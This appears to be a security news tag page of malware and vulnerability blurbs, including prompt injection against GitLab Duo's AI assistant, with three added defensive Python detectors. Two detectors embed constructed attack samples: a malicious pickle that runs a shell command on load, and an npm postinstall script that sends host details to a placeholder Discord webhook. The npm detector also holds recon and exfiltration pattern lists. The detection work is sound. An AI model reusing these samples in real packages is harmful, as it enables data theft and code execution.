Tag: malicious
-
Malicious PyPI packages exploit ML models to deploy infostealer
First seen on scworld.com Jump to article: www.scworld.com/brief/malicious-pypi-packages-exploit-ml-models-to-deploy-infostealer
-
New PumaBot botnet brute forces SSH credentials to breach devices
A newly discovered Go-based Linux botnet malware named PumaBot is brute-forcing SSH credentials on embedded IoT devices to deploy malicious payloads. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/new-pumabot-botnet-brute-forces-ssh-credentials-to-breach-devices/
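Added example, not code from the BleepingComputer report or from the PumaBot analysis: a small Python detector for the credential-guessing pattern described above, run over constructed OpenSSH auth-log lines (the hostnames, addresses and timestamps are made up for the demo). It counts failed logins per source address in a sliding window and, as the highest-priority finding, flags a successful login from an address that was already over the threshold, which is the moment a brute-force run turns into a compromised device.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample of an OpenSSH auth log (not real PumaBot traffic): one source
# hammers root/admin-style logins and then succeeds; two other hosts behave normally.
SAMPLE_AUTH_LOG = """\
May 27 10:01:02 edge-cam sshd[1201]: Failed password for root from 203.0.113.10 port 51234 ssh2
May 27 10:01:03 edge-cam sshd[1202]: Failed password for invalid user admin from 203.0.113.10 port 51240 ssh2
May 27 10:01:05 edge-cam sshd[1203]: Failed password for root from 203.0.113.10 port 51244 ssh2
May 27 10:01:07 edge-cam sshd[1204]: Failed password for invalid user ubnt from 203.0.113.10 port 51250 ssh2
May 27 10:01:09 edge-cam sshd[1205]: Failed password for root from 203.0.113.10 port 51255 ssh2
May 27 10:01:11 edge-cam sshd[1206]: Failed password for invalid user pi from 203.0.113.10 port 51260 ssh2
May 27 10:01:20 edge-cam sshd[1210]: Accepted password for root from 203.0.113.10 port 51300 ssh2
May 27 10:02:00 edge-cam sshd[1250]: Failed password for ops from 192.0.2.5 port 40010 ssh2
May 27 10:02:04 edge-cam sshd[1251]: Accepted password for ops from 192.0.2.5 port 40012 ssh2
May 27 10:05:00 edge-cam sshd[1300]: Accepted publickey for ops from 198.51.100.7 port 40000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_line(line, year=2025):
    """Parse one sshd auth line. Syslog timestamps carry no year, so one is assumed."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(lines, threshold=5, window_s=60):
    """Sliding-window count of failed logins per source IP.

    Returns {ip: {"failures": n, "users": [...], "success_after_burst": bool}} for every
    address that reached `threshold` failures inside `window_s` seconds. A later
    successful login from such an address means a guessed credential worked.
    """
    recent = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    users = defaultdict(set)      # ip -> usernames tried
    flagged = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, result, user, ip = parsed
        if result == "Failed":
            q = recent[ip]
            q.append(ts)
            users[ip].add(user)
            while (ts - q[0]).total_seconds() > window_s:
                q.popleft()
            if len(q) >= threshold:
                entry = flagged.setdefault(
                    ip, {"failures": 0, "users": [], "success_after_burst": False})
                entry["failures"] = max(entry["failures"], len(q))
                entry["users"] = sorted(users[ip])
        elif result == "Accepted" and ip in flagged:
            flagged[ip]["success_after_burst"] = True
    return flagged


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_AUTH_LOG.splitlines()).items():
        print(ip, info)
```

The threshold and window are deliberately low so the constructed sample trips them; tune them to the device's real login rate. On an embedded device that has to stay reachable over SSH, the durable fix is to stop password guessing from mattering at all (key-only authentication and no remote root login), which this detector does not replace.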
-
Czech Republic Blames China-Linked APT31 Hackers for 2022 Cyberattack
The Czech Republic on Wednesday formally accused a threat actor associated with the People’s Republic of China (PRC) of targeting its Ministry of Foreign Affairs. In a public statement, the government said it identified China as the culprit behind a malicious campaign targeting one of the unclassified networks of the Czech Ministry of Foreign Affairs. The…
-
Fake AI Video Tool Ads on Facebook, LinkedIn Spread Infostealers
Mandiant Threat Defense uncovers a campaign where Vietnam-based group UNC6032 tricks users with malicious social media ads for… First seen on hackread.com Jump to article: hackread.com/fake-ai-video-tool-ads-facebook-linkedin-infostealers/
-
Worldwide Operation Shuts Down Hundreds of Ransomware Servers and Domains, Ending Key Attack Infrastructure
Law enforcement and judicial officials, working together with Europol and Eurojust, have dealt a devastating blow to the worldwide ransomware ecosystem in a historic international operation. From May 19 to 22, 2025, Operation Endgame targeted the critical infrastructure behind ransomware attacks, dismantling approximately 300 servers and neutralizing 650 malicious domains worldwide. This operation not only…
-
Apple Blocked 2 Million Malicious Apps, $9 Billion in Fraudulent Transactions
Apple has strengthened the App Store as a bulwark of confidence, a remarkable testament to its commitment to customer safety. According to the company’s annual fraud analysis, over the past five years, Apple has thwarted more than $9 billion in fraudulent transactions, with a staggering $2 billion prevented in 2024 alone. This achievement underscores Apple’s…
-
Fake Bitdefender Site Spreads Trio of Malware Tools
A spoofed Bitdefender site has been used in a malicious campaign distributing VenomRAT and other malware, according to DomainTools First seen on infosecurity-magazine.com Jump to article: www.infosecurity-magazine.com/news/fake-bitdefender-site-spreads/
-
Threat Actors Weaponize Fake AI-Themed Websites to Deliver Python-based infostealers
Mandiant Threat Defense has uncovered a malicious campaign orchestrated by the threat group UNC6032, which capitalizes on the global fascination with artificial intelligence (AI). Since at least mid-2024, UNC6032 has been deploying fake AI video generator websites to distribute malware, specifically targeting users through deceptive social media ads on platforms like Facebook and LinkedIn. These…
-
251 Malicious IPs Target Cloud-Based Device Exploiting 75 Exposure Points
On May 8, 2025, cybersecurity researchers at GreyNoise detected a highly orchestrated scanning operation targeting 75 known exposure points across the internet in just 24 hours. The campaign, executed by 251 malicious IP addresses, all geolocated to Japan and hosted on Amazon Web Services (AWS), triggered a diverse array of 75 distinct behaviors, including exploitation…
-
VenomRAT Malware Introduces New Tools for Password Theft and Stealthy Access
A malicious cyber campaign leveraging VenomRAT, a potent Remote Access Trojan (RAT), has been uncovered, posing a significant threat to unsuspecting users through a deceptive website mimicking Bitdefender’s Antivirus for Windows download page. The fraudulent domain, “bitdefender-download[.]com,” lures victims with a spoofed interface titled “DOWNLOAD FOR WINDOWS,” closely resembling the legitimate site but with subtle…
-
SilentWerewolf Attack Combines Legitimate Tools with Code Obfuscation for Stealthy Infiltration
The threat actor dubbed SilentWerewolf has employed advanced phishing techniques to infiltrate organizations in Russia and Moldova, focusing on critical sectors such as nuclear energy, aircraft, and mechanical engineering. Starting on March 11, the first campaign used spearphishing emails with malicious links to distribute ZIP archives containing a novel C# loader disguised as legal documents.…
-
Crooks use a fake antivirus site to spread Venom RAT and a mix of malware
Researchers found a fake Bitdefender site spreading the Venom RAT by tricking users into downloading it as antivirus software. DomainTools Intelligence (DTI) researchers warn of a malicious campaign using a fake website (“bitdefender-download[.]com”) spoofing Bitdefender’s Antivirus for Windows download page to trick visitors into downloading a remote access trojan called Venom RAT. A malicious campaign…
-
251 Amazon-Hosted IPs Used in Exploit Scan Targeting ColdFusion, Struts, and Elasticsearch
Cybersecurity researchers have disclosed details of a coordinated cloud-based scanning activity that targeted 75 distinct “exposure points” earlier this month. The activity, observed by GreyNoise on May 8, 2025, involved as many as 251 malicious IP addresses that are all geolocated to Japan and hosted by Amazon. “These IPs triggered 75 distinct behaviors, including CVE exploits, First…
-
Patched GitLab Duo Flaws Risked Code Leak, Malicious Content
Prompt Injection, HTML Output Rendering Could Be Used for Exploit. Hackers can exploit vulnerabilities in a generative artificial intelligence assistant integrated across GitLab’s DevSecOps platform to manipulate the model’s output, exfiltrate source code and potentially deliver malicious content through the platform’s user interface. First seen on govinfosecurity.com Jump to article: www.govinfosecurity.com/patched-gitlab-duo-flaws-risked-code-leak-malicious-content-a-28499
-
Cybercriminals Clone Antivirus Site to Spread Venom RAT and Steal Crypto Wallets
Tags: access, antivirus, credentials, crypto, cybercrime, cybersecurity, finance, malicious, rat, software
Cybersecurity researchers have disclosed a new malicious campaign that uses a fake website advertising antivirus software from Bitdefender to dupe victims into downloading a remote access trojan called Venom RAT. The campaign indicates a “clear intent to target individuals for financial gain by compromising their credentials, crypto wallets, and potentially selling access to their systems,” the…
-
US authorities charge 16 in operation to disrupt DanaBot malware
Authorities said malware linked to Russia-based cybercrime group infected more than 300,000 computers around the world with the malicious code. First seen on cybersecuritydive.com Jump to article: www.cybersecuritydive.com/news/us-authorities-disrupt-danabot-malware/748991/
-
GitLab Vulnerability ‘Highlights the Double-Edged Nature of AI Assistants’
A remote prompt injection flaw in GitLab Duo allowed attackers to steal private source code and inject malicious HTML. GitLab has since patched the issue. First seen on techrepublic.com Jump to article: www.techrepublic.com/article/news-gitlab-duo-vulnerability-hidden-prompts/
-
Malicious Machine Learning Model Attack Discovered on PyPI
A novel attack exploited machine learning models on PyPI, using zipped Pickle files to deliver infostealer malware First seen on infosecurity-magazine.com Jump to article: www.infosecurity-magazine.com/news/malicious-machine-learning-model/
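Added example, not code from the article or from the researchers it cites: a static scanner that walks a pickle stream's opcodes with the standard library's pickletools without ever unpickling it, and applies the same check to every .pkl member of a zip archive (the zip-of-pickle layout that PyTorch checkpoints use, which is the "zipped Pickle" shape the article describes). Every import opcode (GLOBAL, STACK_GLOBAL) and every call or construct opcode (REDUCE, INST, OBJ, NEWOBJ, NEWOBJ_EX, BUILD) is reported. The module.attr resolution for STACK_GLOBAL is a heuristic that follows string pushes and memo slots; the sample payload (a __reduce__ that points at subprocess.check_output), the benign state-dict and the member names are constructed for the demo.

```python
import io
import pickle
import pickletools
import subprocess
import zipfile

# Opcodes that let a pickle import or call code while it is being loaded.
IMPORT_OPS = {"GLOBAL", "STACK_GLOBAL"}
CALL_OPS = {"REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "BUILD"}
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING", "UNICODE",
              "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def scan_pickle(data: bytes) -> list:
    """Statically list import/call opcodes in a pickle stream. Never calls pickle.loads().

    Returns [(opcode_name, detail), ...]: detail is "module.attr" for imports and the
    byte offset for call opcodes. Resolving STACK_GLOBAL's target is a heuristic that
    tracks string pushes and memo slots; it covers what pickle.dumps() emits.
    """
    findings = []
    strings = []   # strings pushed so far (a rough stand-in for the real pickle stack)
    memo = {}
    try:
        for op, arg, pos in pickletools.genops(data):
            name = op.name
            if name in STRING_OPS:
                strings.append(arg)
            elif name == "MEMOIZE":                      # memo slot = next free index
                memo[len(memo)] = strings[-1] if strings else None
            elif name in ("PUT", "BINPUT", "LONG_BINPUT"):
                memo[arg] = strings[-1] if strings else None
            elif name in ("GET", "BINGET", "LONG_BINGET"):
                strings.append(memo.get(arg))
            elif name == "GLOBAL":                       # arg is "module attr"
                findings.append((name, arg.replace(" ", ".", 1)))
            elif name == "STACK_GLOBAL":                 # module and attr are the last two strings
                target = ".".join(str(s) for s in strings[-2:]) if len(strings) >= 2 else "?"
                findings.append((name, target))
            elif name in CALL_OPS:
                findings.append((name, f"offset {pos}"))
    except ValueError as exc:        # truncated or corrupt stream: treat as suspicious
        findings.append(("MALFORMED", str(exc)))
    return findings


def scan_zipped_model(blob: bytes) -> dict:
    """Scan every .pkl member of a zip archive (the layout torch.save writes)."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.filename.endswith(".pkl"):
                results[info.filename] = scan_pickle(zf.read(info))
    return results


class _ReconPayload:
    """Constructed demo object: unpickling it would run subprocess.check_output("id")."""
    def __reduce__(self):
        return (subprocess.check_output, ("id",))


def build_samples() -> tuple:
    """Constructed inputs: a harmless state-dict-like pickle and the malicious one."""
    benign = pickle.dumps({"weights": [0.1, 0.2], "epoch": 3}, protocol=4)
    malicious = pickle.dumps(_ReconPayload(), protocol=4)
    return benign, malicious


def build_zip(member: str, payload: bytes) -> bytes:
    """Wrap one pickle in an in-memory zip, mimicking a model checkpoint."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(member, payload)
    return buf.getvalue()


if __name__ == "__main__":
    benign, malicious = build_samples()
    print("benign:", scan_pickle(benign))
    print("malicious:", scan_pickle(malicious))
    print("zipped:", scan_zipped_model(build_zip("archive/data.pkl", malicious)))
```

Real model files legitimately contain GLOBAL/STACK_GLOBAL imports (tensor reconstruction helpers, for example), so in practice the import findings are compared against an allowlist of expected module.attr targets rather than treated as a verdict on their own; anything that resolves to os, subprocess, builtins or a network module is the signal. Loading untrusted weights through a loader that refuses arbitrary globals, or shipping them in a format that cannot carry code at all, removes the problem rather than detecting it.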
-
Hackers drop 60 npm bombs in less than two weeks to recon dev machines
Tags: attack, data, detection, email, framework, hacker, malicious, open-source, rce, remote-code-execution, supply-chain, threat, tool
The accounts are now defunct: The first three malicious packages, “e-learning-garena,” “seatalk-rn-leave-calendar,” and “coral-web-be,” were released under the npm accounts bbbb335656, cdsfdfafd1232436437, and sdsds656565, respectively. Since then, all three accounts have gone on to publish twenty malicious packages each. According to Socket, the first package emerged eleven days ago, and the most recent appeared only hours…
-
AI, Quantum and the Evolving Threat Landscape: Key Findings from the Thales 2025 Data Threat Report
Tags: ai, api, attack, authentication, awareness, breach, cloud, compliance, computing, control, crypto, cryptography, data, encryption, guide, malicious, malware, mfa, nist, passkey, phishing, privacy, programming, ransomware, regulation, risk, software, strategy, threat, tool, vulnerability
madhav, Tue, 05/27/2025 – 04:40
The Thales 2025 Data Threat Report reveals a critical inflection point in global cybersecurity. As the threat landscape grows more complex and hostile, the rapid adoption of generative AI is amplifying both opportunity and…
-
GIMP Image Editor Vulnerability Allows Remote Attackers to Execute Arbitrary Code
Two major security vulnerabilities have been found in the widely used GIMP image editing software, potentially allowing remote attackers to execute arbitrary code on affected systems, according to security researchers. The vulnerabilities, labeled CVE-2025-2760 and CVE-2025-2761, each have a high CVSS score of 7.8 and impact users who open malicious image files or visit compromised…
-
Silver RAT Malware Employs New Anti-Virus Bypass Techniques to Execute Malicious Activities
A newly identified strain of malware, dubbed Silver RAT, has emerged as a significant threat to cybersecurity, leveraging sophisticated anti-virus bypass techniques to infiltrate and compromise Windows-based systems. This remote access trojan (RAT), believed to be crafted by a highly skilled threat actor or group, demonstrates an alarming ability to evade detection by traditional security…
-
Hackers Exploit HTTP/2 Flaw to Launch Arbitrary Cross-Site Scripting Attacks
A groundbreaking study from Tsinghua University and Zhongguancun Laboratory has uncovered critical vulnerabilities in modern web infrastructure, revealing that HTTP/2 server push and Signed HTTP Exchange (SXG) features can be exploited to bypass the Same-Origin Policy (SOP), a cornerstone of web security. The SOP is designed to prevent malicious scripts on one website from accessing…
-
60 Malicious npm Packages Exfiltrate Hostnames, IP Addresses, and DNS Server Details
Socket’s Threat Research Team has revealed a sophisticated and ongoing campaign targeting the npm ecosystem, involving 60 malicious packages published under three distinct accounts: bbbb335656, cdsfdfafd1232436437, and sdsds656565. First detected just eleven days ago, with the latest package appearing mere hours before this report, these packages embed a covert script that activates during the…
-
Over 70 Malicious npm and VS Code Packages Found Stealing Data and Crypto
As many as 60 malicious npm packages have been discovered in the package registry with malicious functionality to harvest hostnames, IP addresses, DNS servers, and user directories to a Discord-controlled endpoint. The packages, published under three different accounts, come with an install-time script that’s triggered during npm install, Socket security researcher Kirill Boychenko said in a…
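Added example covering the two Socket write-ups above (the 60-package recon campaign and the install-time script it relies on); this is not Socket's code and not taken from any of the packages named. It audits a package for the shape of that attack: a lifecycle hook in package.json (preinstall/install/postinstall/prepare) whose script fingerprints the host (hostname, network interfaces, DNS servers, home directory) and posts the result to a Discord webhook. The package.json, the setup script and the webhook URL are constructed for the demo; in practice the file map would come from the package tarball.

```python
import json
import re

# Constructed sample package (not one of the packages in the article): a postinstall
# hook runs a script that fingerprints the host and posts it to a Discord webhook.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-recon-pkg",
    "version": "1.0.0",
    "scripts": {"postinstall": "node setup.js"},
})
SAMPLE_SETUP_JS = """\
const os = require('os'); const dns = require('dns'); const https = require('https');
const info = { h: os.hostname(), n: os.networkInterfaces(), d: dns.getServers(), u: os.homedir() };
const req = https.request('https://discord.com/api/webhooks/000/constructed-example', { method: 'POST' });
req.end(JSON.stringify(info));
"""
# Constructed clean package for comparison: only a test script, no lifecycle hook.
CLEAN_PACKAGE_JSON = json.dumps({
    "name": "example-clean-pkg", "version": "1.0.0", "scripts": {"test": "node test.js"},
})

# Hooks npm runs automatically during `npm install` of a dependency.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Indicators of host reconnaissance and exfiltration in Node code.
RECON_PATTERNS = {
    "hostname": r"os\.hostname\(",
    "network_interfaces": r"os\.networkInterfaces\(",
    "dns_servers": r"dns\.getServers\(",
    "home_dir": r"os\.homedir\(|process\.env\.HOME",
    "discord_webhook": r"discord(?:app)?\.com/api/webhooks",
    "outbound_http": r"https?\.request\(|fetch\(",
}


def audit_package(package_json: str, files: dict) -> dict:
    """Flag lifecycle hooks and recon/exfil indicators in the scripts they invoke.

    `files` maps a file name in the package to its contents. Returns the hooks found,
    the sorted indicator labels, and a verdict: "ok" (no hook), "review" (hook but no
    indicator), or "block" (hook that runs recon/exfil code).
    """
    pkg = json.loads(package_json)
    scripts = pkg.get("scripts", {})
    hooks = {h: scripts[h] for h in LIFECYCLE_HOOKS if h in scripts}
    indicators = set()
    for hook_cmd in hooks.values():
        bodies = [hook_cmd]                      # inline shell in the hook itself counts
        bodies += [body for fname, body in files.items() if fname in hook_cmd]
        for body in bodies:
            for label, pattern in RECON_PATTERNS.items():
                if re.search(pattern, body):
                    indicators.add(label)
    if hooks and indicators:
        verdict = "block"
    elif hooks:
        verdict = "review"
    else:
        verdict = "ok"
    return {"hooks": hooks, "indicators": sorted(indicators), "verdict": verdict}


if __name__ == "__main__":
    print(audit_package(SAMPLE_PACKAGE_JSON, {"setup.js": SAMPLE_SETUP_JS}))
    print(audit_package(CLEAN_PACKAGE_JSON, {"test.js": "console.log('ok');"}))
```

The check is a triage aid, not a verdict: obfuscated or dynamically assembled code will not match these patterns, and plenty of legitimate packages have a postinstall hook (native builds, for instance). The policy that removes the attack surface is installing with scripts disabled (`npm install --ignore-scripts`, or `ignore-scripts=true` in .npmrc) and enabling hooks only for packages that have been reviewed.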
-
Over 40 Malicious Chrome Extensions Impersonate Popular Brands to Steal Sensitive Data
Tags: browser, chrome, cyber, cybersecurity, data, google, intelligence, malicious, phishing, tactics
Cybersecurity firm LayerX has uncovered over 40 malicious Chrome browser extensions, many of which are still available on the Google Chrome Web Store. These extensions, part of three distinct phishing campaigns, were designed to impersonate well-known and trusted applications and brands.
Detailed Analysis Reveals Impersonation Tactics
LayerX, building off initial research by the DomainTools Intelligence…
-
Bitwarden Flaw Allows Upload of Malicious PDFs, Posing Security Risk
A serious security vulnerability has been identified in Bitwarden, the popular password management platform, affecting versions up to 2.25.1. The flaw, designated CVE-2025-5138, allows attackers to execute cross-site scripting (XSS) attacks through malicious PDF files uploaded to the platform’s file handling system.
Vulnerability Details and Technical Analysis
The vulnerability stems from insufficient file type restrictions…

